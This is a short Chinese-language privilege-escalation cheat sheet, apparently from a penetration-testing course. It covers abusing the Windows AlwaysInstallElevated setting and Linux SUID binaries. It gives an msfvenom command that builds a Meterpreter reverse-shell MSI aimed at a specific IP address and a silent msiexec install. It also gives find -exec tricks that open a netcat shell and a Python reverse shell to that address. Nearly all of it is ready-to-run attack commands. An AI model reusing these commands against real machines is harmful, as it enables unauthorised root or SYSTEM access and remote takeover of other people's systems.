Windows-AlwayslnstallElevated提權

AlwaysInstallElevated是登錄檔的一個鍵值（windows 2003)
當其值為1的時候，普通使用者即可以system許可權安裝msi程式。
當前使用者許可權是否能夠更改MSI安裝時的啟用狀態，如不能修改則必須為啟用方可使用本次提權技術。

gpedit.msc

使用者配置>>管理模板>>Windows 元件>>Windows Installer>>始終以提升的許可權進行安裝 已啟用

.msi是系統安裝檔案

啟動狀態才可以成功
判斷是否存在window本地提權安全問題：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

生成利用的MSI檔案:

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117  lport=5555 -f msi -o xiaodi.msi

執行MSI:

msiexec /quiet /qn /i xiaodi.msi

SUID提權

手工命令探針安全：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
 

存在 Nmap/Vim/find/Bash/More/Less/Nano/cp之一，就有可能存在SUID提權

touch xiaodi

//會建立一個xiaodi的目錄，然後通過搜尋xiaodi並攜帶命令達到system的許可權執行命令

find xiaodi -exec whoami ;

利用NC反彈：

find xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555

利用Python反彈：

find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.94.236.117",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ;
nc -lvp 7777